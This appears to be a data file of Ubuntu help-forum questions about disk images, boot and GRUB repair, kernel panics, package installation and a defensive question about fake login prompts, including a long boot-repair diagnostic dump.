176369	how do you mount an hd image made from ddrescue ?	today i used ddrescue to make an image of a failed hd . i stored this image on a separate partition on my 500 gb hd . the partition is : sda8 and the filename is backup.img . the image was of an hd that had windows vista installed on it . i do n't care about the windows os on it at all . i simply want to be able to browse the data on it so i can retrieve it and store it elsewhere . so the question again : how do i mount this image .
176373	how to secure terminal logout ?	while reading about bashrc , i ran into the following fundamental problem of terminal-only machines : if i run malicious software with a restricted account , it could edit my `` .bashrc '' file and set an alias to logout . the alias would point to the malicious executable and upon logout it would fake a login screen and obtain passwords to non-restricted accounts and possibly root . while the quick solution seems to be to set `` chattr +i .bashrc '' as root , making the file immutable for non-root users , i do n't think this is sufficient . shells are very complex and there might be other ways of defining aliases which i do not know about . i thought about what the core of the issue is and to me it seems that terminal-only machines allow full control of the ui which is displayed to running software . so one solution would be to wrap the terminal in a larger piece of ui which displays the current logged in user . this would take away some of the screen though . another solution would be a special reserved key on the keyboard which forces logout and can not be re-defined by any aliases and can not be monitored by any non-root software . is there some software which provides this or a similar solution ?
176376	lubuntu : after boot , keyboard does not work	so i boot up lubuntu for the first time and it brings me to the setup screen with language selection and such . only problem is i can not use my gateway ps/2 connection keyboard . for some reason , it shuts off or something like that . i just can not use it . any ideas ? : (
176384	the hard drive only show two partition when install ubuntu 12.04	why when i start install ubuntu using cd drive ( windows 7 has installed ) , the hard drive only show two partition.. ? whereas i have four partition and 40gb unallocated ( i planned this for install ubuntu ) on my asus n43sl notebook.. shown when install ubuntu : 100 mb system , 150 gb ( windows 7 ) and 590 gb ( 40 gb not shown ) shown on windows 7 : 100 mb system , 150 gb drive c , 194 gb drive e , 220 gb drive f , 100 gb drive g ,
176385	unable to fetch deb file : connection refused	i was trying to install emacs and i got a bunch of errors like this : failed to fetch http : //tr.archive.ubuntu.com/ubuntu/pool/main/e/emacsen-common/emacsen-common_1.4.22ubuntu1_all.deb could not connect to 127.0.0.1:8118 ( 127.0.0.1 ) . - connect ( 111 : connection refused ) i tried apt-get update but it gives an error too . so i found out that port 8118 is used by tor . tor is not running right now and proxy settings are on automatic . what can i do ?
176386	i have an issue booting my system , what can i do to fix it ?	i can not boot into linux or windows now . i did the boot repair but every time i turn my computer on it goes to windows then into recovery mode and i went through that and it still brings me back . i can only get in ubuntu through the live disc . this is my paste : boot info script 0.61.full + boot-repair extra info [ boot-info august 2nd 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos5 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe /ubuntu/winboot/wubildr /ubuntu/winboot/wubildr.mbr sda4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04.1 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda6 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 2,048 36,866,047 36,864,000 27 hidden ntfs ( recovery environment ) /dev/sda2 * 36,866,048 37,070,847 204,800 7 ntfs / exfat / hpfs /dev/sda3 37,070,848 1,120,164,979 1,083,094,132 7 ntfs / exfat / hpfs /dev/sda4 1,120,165,886 1,953,523,711 833,357,826 5 extended /dev/sda5 1,120,165,888 1,945,663,487 825,497,600 83 linux /dev/sda6 1,945,665,536 1,953,523,711 7,858,176 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 701c63931c635360 ntfs pqservice /dev/sda2 967cf34f7cf3291f ntfs system reserved /dev/sda3 761e26e71e269fdb ntfs acer /dev/sda5 ab063406-c2b4-49fc-94c7-d91c1592faff ext4 /dev/sda6 49b9ffb8-d013-4b78-9027-09e8ce95682b swap /dev/sr0 iso9660 ubuntu 12.04 lts amd64 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sda5/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' windows recovery environment ( loader ) ( on /dev/sda1 ) '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root ab063406-c2b4-49fc-94c7-d91c1592faff if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root ab063406-c2b4-49fc-94c7-d91c1592faff set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.2.0-29-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root ab063406-c2b4-49fc-94c7-d91c1592faff linux /boot/vmlinuz-3.2.0-29-generic root=uuid=ab063406-c2b4-49fc-94c7-d91c1592faff ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-29-generic } menuentry 'ubuntu , with linux 3.2.0-29-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root ab063406-c2b4-49fc-94c7-d91c1592faff echo 'loading linux 3.2.0-29-generic ... ' linux /boot/vmlinuz-3.2.0-29-generic root=uuid=ab063406-c2b4-49fc-94c7-d91c1592faff ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-29-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.2.0-23-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root ab063406-c2b4-49fc-94c7-d91c1592faff linux /boot/vmlinuz-3.2.0-23-generic root=uuid=ab063406-c2b4-49fc-94c7-d91c1592faff ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic } menuentry 'ubuntu , with linux 3.2.0-23-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root ab063406-c2b4-49fc-94c7-d91c1592faff echo 'loading linux 3.2.0-23-generic ... ' linux /boot/vmlinuz-3.2.0-23-generic root=uuid=ab063406-c2b4-49fc-94c7-d91c1592faff ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-23-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root ab063406-c2b4-49fc-94c7-d91c1592faff linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root ab063406-c2b4-49fc-94c7-d91c1592faff linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows recovery environment ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 701c63931c635360 drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` windows 7 ( loader ) ( on /dev/sda2 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 967cf34f7cf3291f chainloader +1 } menuentry `` windows 7 ( loader ) ( on /dev/sda3 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 761e26e71e269fdb chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda5/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=ab063406-c2b4-49fc-94c7-d91c1592faff / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=49b9ffb8-d013-4b78-9027-09e8ce95682b none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda5 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 862.277381897 = 925.863288832 boot/grub/core.img 1 862.279846191 = 925.865934848 boot/grub/grub.cfg 1 536.071788788 = 575.602700288 boot/initrd.img-3.2.0-23-generic 2 537.271041870 = 576.890388480 boot/initrd.img-3.2.0-29-generic 2 862.270248413 = 925.855629312 boot/vmlinuz-3.2.0-23-generic 1 536.492904663 = 576.054870016 boot/vmlinuz-3.2.0-29-generic 1 536.071788788 = 575.602700288 initrd.img.old 2 536.492904663 = 576.054870016 vmlinuz 1 862.270248413 = 925.855629312 vmlinuz.old 1 additional information : =================== log of boot-repair 2012-08-16__02h01 =================== boot-repair version : 3.18-0ppa47~precise boot-sav version : 3.192-0ppa5~precise glade2script version : 0.3.2.1-0ppa7~precise boot-sav-nonfree version : 3.18-0ppa10~precise w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20120425 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20120425 ) _dists_precise_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 619 not upgraded . dpkg-preconfigure : unable to re-open stdin : no such file or directory boot-repair is executed in live-session ( ubuntu 12.04 lts , precise , ubuntu , x86_64 ) cpu op-mode ( s ) : 32-bit , 64-bit =================== os-prober : /dev/sda1 : windows recovery environment ( loader ) : windows : chain /dev/sda2 : windows 7 ( loader ) : windows1 : chain /dev/sda5 : ubuntu 12.04.1 lts ( 12.04 ) : ubuntu : linux =================== blkid : /dev/loop0 : type= '' squashfs '' /dev/sda1 : label= '' pqservice '' uuid= '' 701c63931c635360 '' type= '' ntfs '' /dev/sda2 : label= '' system reserved '' uuid= '' 967cf34f7cf3291f '' type= '' ntfs '' /dev/sda3 : label= '' acer '' uuid= '' 761e26e71e269fdb '' type= '' ntfs '' /dev/sda5 : uuid= '' ab063406-c2b4-49fc-94c7-d91c1592faff '' type= '' ext4 '' /dev/sda6 : uuid= '' 49b9ffb8-d013-4b78-9027-09e8ce95682b '' type= '' swap '' /dev/sr0 : label= '' ubuntu 12.04 lts amd64 '' type= '' iso9660 '' 1 disks with os , 3 os : 1 linux , 0 macos , 2 windows , 0 unknown type os . windows not detected by os-prober on sda3 . warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . =================== sda5/etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' windows recovery environment ( loader ) ( on /dev/sda1 ) '' # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' =================== sda5/etc/grub.d/ : drwxr-xr-x 2 root root 4096 aug 15 04:10 grub.d total 56 -rwxr-xr-x 1 root root 6715 apr 17 18:20 00_header -rwxr-xr-x 1 root root 5522 apr 17 17:57 05_debian_theme -rwxr-xr-x 1 root root 7407 may 17 07:21 10_linux -rwxr-xr-x 1 root root 6335 apr 17 18:20 20_linux_xen -rwxr-xr-x 1 root root 1588 nov 27 2011 20_memtest86+ -rwxr-xr-x 1 root root 7603 apr 17 18:20 30_os-prober -rwxr-xr-x 1 root root 214 apr 17 18:20 40_custom -rwxr-xr-x 1 root root 95 apr 17 18:20 41_custom -rw-r -- r -- 1 root root 483 apr 17 18:20 readme =================== dmesg | grep efi : this live-session is not in efi-mode . [ 4.095388 ] efi variables facility v0.08 2004-may-17 =================== partitions & disks : sda1 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , recovery-or-hidden , bootmgr , no-grldr , boot/bcd , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda1 . sda2 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , bootmgr , no-grldr , boot/bcd , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda2 . sda3 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , haswinload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda3 . sda5 : sda , not-sepboot , grubenv-ok grub2 , grub-pc , update-grub , 64 , with-boot , is-os , not -- efi -- part , fstab-without-boot , fstab-without-efi , no-nt , no-winload , no-recov-nor-hid , no-bmgr , no-grldr , no-b-bcd , apt-get , grub-install , with -- usr , fstab-without-usr , not-sep-usr , standard , farbios , /mnt/boot-sav/sda5 . sda : msdos , not-gpt , biosboot-not-needed , has-no-efipart , not-usb , 2048 sectors * 512 bytes =================== parted -l : model : ata wdc wd10eadx-22t ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 18.9gb 18.9gb primary ntfs diag 2 18.9gb 19.0gb 105mb primary ntfs boot 3 19.0gb 574gb 555gb primary ntfs 4 574gb 1000gb 427gb extended 5 574gb 996gb 423gb logical ext4 6 996gb 1000gb 4023mb logical linux-swap ( v1 ) warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) /dev/sda1 on /mnt/boot-sav/sda1 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda2 on /mnt/boot-sav/sda2 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda3 on /mnt/boot-sav/sda3 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda5 on /mnt/boot-sav/sda5 type ext4 ( rw ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 sda3 sda4 sda5 sda6 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : autofs block bsg btrfs-control bus cdrom cdrw char console core cpu cpu_dma_latency disk dri dvd dvdrw ecryptfs fb0 fd full fuse hidraw0 hidraw1 hidraw2 hpet input kmsg log mapper mcelog mem net network_latency network_throughput null oldmem port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda3 sda4 sda5 sda6 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout uinput urandom usbmon0 usbmon1 usbmon2 vga_arbiter zero ls /dev/mapper : control ls /mnt/boot-sav/sda3 : windows users ubuntu information volume system settings.ini games riot $ recycle.bin recovery psfonts ( x86 ) files program files program programdata pfiles perflogs pagefile.sys oem nexon msocache mod01set7b000g0026.enc mod01set0j000n000u.enc hiberfil.sys game f3ecc2cfc0833c2cbcf0967c extensions e9bbe619e36eafea7b47 settings and documents dfu config.msi codec-info ce941eaec1e81c8ed35546049f61c3 bootsqm.dat bootsect.bak boot-sav book backup1 backup ai_recyclebin acersw { 9af94b62-0c6b-43af-adbd-ebdcd1b729e1 } 7281e5cb786c2997988879 { 48b4d502-6502-4bc0-85ac-eeab4b5747b2 } 43eac1e30085fa141b7d5b41 2dc9fa325b4bf2cad9e6b0031690 09aa5e920fb2bffe9bd3 03d4f85f9233980bfda4d9c6 =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 1.9g 388m 1.5g 21 % / udev devtmpfs 1.8g 12k 1.8g 1 % /dev tmpfs tmpfs 741m 820k 740m 1 % /run /dev/sr0 iso9660 1.6g 1.6g 0 100 % /cdrom /dev/loop0 squashfs 1.5g 1.5g 0 100 % /rofs tmpfs tmpfs 1.9g 32k 1.9g 1 % /tmp none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 1.9g 208k 1.9g 1 % /run/shm /dev/sda1 fuseblk 18g 12g 6.3g 65 % /mnt/boot-sav/sda1 /dev/sda2 fuseblk 100m 26m 75m 26 % /mnt/boot-sav/sda2 /dev/sda3 fuseblk 517g 110g 408g 22 % /mnt/boot-sav/sda3 /dev/sda5 ext4 394g 9.4g 365g 3 % /mnt/boot-sav/sda5 =================== fdisk -l : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x30b99ef2 device boot start end blocks id system /dev/sda1 2048 36866047 18432000 27 hidden ntfs winre /dev/sda2 * 36866048 37070847 102400 7 hpfs/ntfs/exfat /dev/sda3 37070848 1120164979 541547066 7 hpfs/ntfs/exfat /dev/sda4 1120165886 1953523711 416678913 5 extended /dev/sda5 1120165888 1945663487 412748800 83 linux /dev/sda6 1945665536 1953523711 3929088 82 linux swap / solaris partition outside the disk detected . =================== recommended repair recommended-repair this setting will reinstall the grub2 of sda5 into the mbr of sda . additional repair will be performed : unhide-bootmenu-10s fix-windows-boot quantity of real windows : 1 copied win boot files from sda2 to sda3 reinstall the grub of sda5 into the mbr of sda grub-install ( grub ) 1.99-21ubuntu3.1 grub-install -- recheck /dev/sda : installation finished . no error reported . exit code of grub-install /dev/sda:0 chroot /mnt/boot-sav/sda5 update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-29-generic found initrd image : /boot/initrd.img-3.2.0-29-generic found linux image : /boot/vmlinuz-3.2.0-23-generic found initrd image : /boot/initrd.img-3.2.0-23-generic found memtest86+ image : /boot/memtest86+.bin found windows recovery environment ( loader ) on /dev/sda1 found windows 7 ( loader ) on /dev/sda2 found windows 7 ( loader ) on /dev/sda3 unhide grub boot menu in sda5/boot/grub/grub.cfg boot successfully repaired . you can now reboot your computer . the boot files of [ ubuntu 12.04.1 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . can anyone help me : ( ?
176387	how do i list uninstalled but recommended packages ?	how do i list the packages that are recommended by my current set of installed packages , but for whatever reason were n't installed ?
176388	3.2.0-29.46-generic-pae kernel boot problem	after updating my kernel to 3.2.0-27 i had problems getting into the system . it was working with the 3.2.0-26 though . i deleted the new kernel and everything was working fine until i started to have the same problem with the 3.2.0-26 too , after a minor update . every time i was getting a black screen and when i was force shutting down the pc the error message broken pipe could be read for a fraction of a second . then i thought maybe the new kernel was fixed and searched for an update and i saw the 3.2.0-29 , which has the same problem . i read some other posts with similar problems and , it 's not from any nvidia driver nor ati , i have the default vga driver . the only option on booting up the system now ( with any other kernel ) is entering `` recovery mode '' and then simply `` resume '' to normal boot which is unpleasant since i have to stay at the pc until the system boots up . edit/add still not working after running boot-repair . this is what i got in the terminal : '' traceback ( most recent call last ) : file `` /usr/bin/glade2script '' , line 2339 , in set_widget exec ( arg ) file `` '' , line 1 , in file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gi._glib.gerror : failed to open file 'boot-repair.png ' : no such file or directory error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 68 , in apport_excepthook binary = os.path.realpath ( os.path.join ( os.getcwdu ( ) , sys.argv [ 0 ] ) ) oserror : [ errno 2 ] no such file or directory original exception was : traceback ( most recent call last ) : file `` /usr/bin/glade2script '' , line 2339 , in set_widget exec ( arg ) file `` '' , line 1 , in file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gi._glib.gerror : failed to open file 'boot-repair.png ' : no such file or directory traceback ( most recent call last ) : file `` /usr/bin/glade2script '' , line 2339 , in set_widget exec ( arg ) file `` '' , line 1 , in file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gi._glib.gerror : failed to open file 'boot-repair.png ' : no such file or directory error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 68 , in apport_excepthook binary = os.path.realpath ( os.path.join ( os.getcwdu ( ) , sys.argv [ 0 ] ) ) oserror : [ errno 2 ] no such file or directory original exception was : traceback ( most recent call last ) : file `` /usr/bin/glade2script '' , line 2339 , in set_widget exec ( arg ) file `` '' , line 1 , in file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gi._glib.gerror : failed to open file 'boot-repair.png ' : no such file or directory ''
176389	unknown filesystem error after virtualbox disk resize	i was using ubuntu 12.04 x64 as a virtual box guest . because i started with it just to do some tests , the vm was created just with 10 gb but grown fast , then i wanted resizing it . of course , i was a fully noob ... no backup before doing it . after some reading , i thought it would be so simple as : vboxmanage modifyhd my_disk.vdi -- resize 81920 unfortunately , no boot : error : unknown filesystem . grub rescue > then i tried many suggestions , including boot-repair as described here : grub rescue after install of ubuntu 12.04 ( dual boot ) . nothing has worked . it seens that my linux partition is n't there anymore ? ! here is the pastebin with all the information collected by boot-repair . and the last try , the gparted live cd ca n't also recover any data , saying that there is n't data on any partition . well , i should just give up ? or some way to recover this disk ?
176394	system strucking when brightness symboll came	my system is strucking , when the brightness symboll came top off the screen on right side , and it is blinking , then that time the system will struck ... .i am completely new to ubuntu , so please help me . thank you sir .
176397	linux kernel 3.0.0-15-generic problem help needed	i 'm new with all this ubuntu and linux programs so please bear with me . my niece gave me her laptop she got from a tutor program and asked me to fix it since it did n't boot all the way . so the problem is once i select ubuntu with linux 3.0.0-15-generic from the gnu grub ( ver 1.99-12ubuntu5 ) loads up the initramfs prompt . what do i do from there ? i 've typed exit and it gives me the following message : [ 85.199633 ] kernel panic - not syncing : attempted to kill init ! [ 85.199689 ] pid : 1 ; comm : init not tainted 3.0.0-15-generic # 26-ubuntu there 's a whole bunch more lines listed , but hopefully this will give you an idea . any help would be much appreciated . should i just download the new version of ubuntu and reboot the whole thing ? if so , can someone give me the step by step instructions ?
176404	perl 5.12 on ubuntu 10.10	how can i use perl 5.12 on ubuntu 10.10 ? there is no distribution package on ubuntu . i have to use feature 'unicode_strings ' ; in my perl code , and this is available from 5.12 . i try to install perl on ubuntu by apt-get install perl , but 5.10 is the latest version . how can i deal with this ? or is there any code in 5.10 can replace the code feature 'unicode_strings ' ; ? thanks .
176408	why ca n't i install vmware tools ?	i am using this guide : installing vmware tools from the command line with the tar installer . when i get to the step where i must type : tar zxf /mnt/cdrom/vmwaretools-5.0.0- < xxxx > .tar.gz i can not get any further because it does n't accept my build number which is 528992 what am i doing wrong ? i am running ubuntu 12.04 .
